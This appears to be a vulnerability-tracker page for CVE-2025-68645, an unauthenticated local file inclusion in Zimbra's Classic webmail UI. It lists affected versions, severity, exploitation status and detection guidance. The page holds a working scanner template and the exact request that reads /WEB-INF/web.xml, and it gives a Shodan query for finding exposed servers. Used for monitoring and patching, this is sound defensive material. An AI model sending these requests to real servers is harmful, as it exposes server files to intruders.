cbcvebase.
CVE-2025-68645
published 2025-12-22

CVE-2025-68645: A Local File Inclusion (LFI) vulnerability exists in the Webmail Classic UI of Zimbra Collaboration (ZCS) 10.0 and 10.1 because of improper handling of…

PriorityP194high8.8CVSS 3.1
AVNACLPRNUIRSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2026-02-12
Exploited in the wild
EPSS
31.77%
98.1th percentile
A Local File Inclusion (LFI) vulnerability exists in the Webmail Classic UI of Zimbra Collaboration (ZCS) 10.0 and 10.1 because of improper handling of user-supplied request parameters in the RestFilter servlet. An unauthenticated remote attacker can craft requests to the /h/rest endpoint to influence internal request dispatching, allowing inclusion of arbitrary files from the WebRoot directory.

Affected

2 ranges
VendorProductVersion rangeFixed in
synacorzimbra_collaboration_suite>= 10.0.0 < 10.0.1810.0.18
synacorzimbra_collaboration_suite>= 10.1.0 < 10.1.1310.1.13

Detection & IOCsextracted from sources · hover to see the quote

path/h/rest
path/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml
path/WEB-INF/web.xml
path/h/changepass
path/h/imessage
path/h/postLoginRedirect
path/h/printcalls
path/h/printcalendar
path/h/printvoicemails
path/h/printappointments
path/h/printcontacts
path/h/printconversations
path/h/printmessage
path/h/printtasks
path/h/viewimages
yara
id: CVE-2025-68645
info:
  name: Zimbra Collaboration - Local File Inclusion
  author: DhiyaneshDk,sirifu4k1
  severity: high
  tags: cve,cve2025,zimbra,zcs,lfi,vkev,kev
http:
- method: GET
  path:
  - "{{BaseURL}}/{{path}}?javax.servlet.include.servlet_path=/WEB-INF/web.xml"
  matchers-condition: and
  matchers:
  - type: word
    part: body
    words:
    - "<web-app"
    - "Zimbra"
    condition: and
  - type: status
    status:
    - 200
  • The exploit uses the `javax.servlet.include.servlet_path` request parameter to trigger LFI via the RestFilter servlet. Monitor HTTP GET requests to any `/h/*` endpoint containing this parameter name.
  • Requests targeting `/WEB-INF/web.xml` via the `javax.servlet.include.servlet_path` parameter are a strong indicator of active exploitation; the Nuclei template confirms a 200 response with `<web-app` and `Zimbra` in the body as a positive match.
  • Shodan fingerprint for exposed Zimbra instances targeted by this CVE is `http.title:"Zimbra Collaboration Suite"`. Use this to identify internet-exposed assets.
  • The vulnerability is unauthenticated and exploitable via HTTP GET with no session required. Web server access logs should be reviewed for any unauthenticated requests to `/h/rest` or other `/h/*` endpoints containing `javax.servlet.include.servlet_path` in the query string.
  • CISA KEV confirms active in-the-wild exploitation. The vulnerability is classified as PHP Remote File Inclusion by CISA, with a remediation due date of 2026-02-12 for federal agencies.
  • ·The LFI vulnerability only affects Zimbra Collaboration (ZCS) versions 10.0 and 10.1 running the Webmail Classic UI with the RestFilter servlet exposed. Fixes were added on January 3–4, 2026.
  • ·The Nuclei template uses `stop-at-first-match: true` across 13 `/h/*` paths, meaning only the first matching endpoint is confirmed per scan run; all listed paths should be independently monitored in production log analysis.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
vulncheck8.8HIGH
cisa8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.